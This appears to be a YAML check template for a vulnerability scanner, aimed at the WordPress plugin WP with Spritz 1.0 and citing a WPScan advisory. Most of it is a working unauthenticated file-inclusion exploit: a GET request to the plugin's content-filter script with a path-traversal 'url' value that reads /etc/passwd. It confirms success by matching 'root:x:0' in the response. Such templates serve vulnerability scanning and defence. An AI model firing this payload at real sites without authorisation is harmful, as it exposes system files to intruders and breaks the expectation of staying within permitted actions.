product: WordPress
vName: WP with Spritz 1.0 - Unauthenticated File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/cdd8b32a-b424-4548-a801-bbacbaad23f8
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
